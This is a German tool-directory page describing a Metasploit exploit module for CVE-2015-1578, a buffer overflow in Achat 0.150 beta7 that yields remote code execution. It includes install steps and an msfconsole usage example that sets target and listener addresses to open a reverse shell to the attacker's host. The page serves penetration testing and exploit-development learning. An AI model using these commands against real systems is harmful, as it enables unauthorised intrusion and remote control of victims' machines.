Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2015-1578-PoC-Metasploit — Dies ist ein Proof-of-Concept-Metasploit-Modul-Exploit für CVE-2015-1578, eine Buffer-Overflow-Sicherheitslücke in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt zur Remotecodeausführung über ein präpariertes UDP-Paket. | Kitploit
Tools/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
Penetrationstest-FrameworksExploit-FrameworksSchwachstellenanalyseExploitationShellcodeRemote-Access-ToolShellcode-GenerierungPayload-EntwicklungBinary-Exploitation
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

Dies ist ein Proof-of-Concept-Metasploit-Modul-Exploit für CVE-2015-1578, eine Buffer-Overflow-Sicherheitslücke in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt zur Remotecodeausführung über ein präpariertes UDP-Paket.

Repository anzeigen
15vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2015-1578 Metasploit-Modul

Überblick

Dies ist ein Metasploit-Modul für CVE-2015-1578, eine Pufferüberlauf-Schwachstelle in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt zu einer Remote-Code-Ausführung über ein manipuliertes UDP-Paket.

Zweck

Dieses Modul dient als sauberes, minimales und gut strukturiertes Beispiel für die Entwicklung von Metasploit-Exploits. Es demonstriert:

  • Dynamische Unicode-kodierte Shellcode-Generierung mittels msfvenom
  • Manuelle Payload-Injektion (Umgehung des internen Payload-Encoders von Metasploit)
  • Einfacher UDP-basierter Auslieferungsmechanismus
  • Integration in das Metasploit-Framework mittels benutzerdefiniertem Modul-Laden

Video-Tutorial

Video Tutorial

Abhängigkeiten

  • Metasploit-Framework
  • msfvenom in Ihrem
$PATH

Funktionen

  • Verwendet msfvenom zur Generierung eines Payloads mit x86/unicode_mixed-Kodierung und benutzerdefinierten ungültigen Zeichen
  • Umgeht das integrierte Payload-Kodierungssystem von Metasploit, um Einschränkungen des Encoders zu umgehen

Installation

root@kitploit:~
./install.sh

Starten Sie dann Metasploit und führen Sie Folgendes aus:

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

Optionen

  • RHOSTS – Ziel-IP-Adresse (erforderlich)
  • LHOST – Lokale Host-IP für die Reverse-Shell (erforderlich)
  • LPORT – Lokaler Port für die Reverse-Shell (Standard: 4444)
  • RPORT – Remote-UDP-Port auf dem Ziel (Standard: 9256)

Anwendungsbeispiel

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

Dies wird:

  • Einen Unicode-kompatiblen Reverse-Shell-Payload mit msfvenom generieren
  • Ihn über UDP in den anfälligen Achat-Puffer injizieren
  • Auf die Shell auf dem angegebenen LHOST:LPORT warten
Tool herunterladen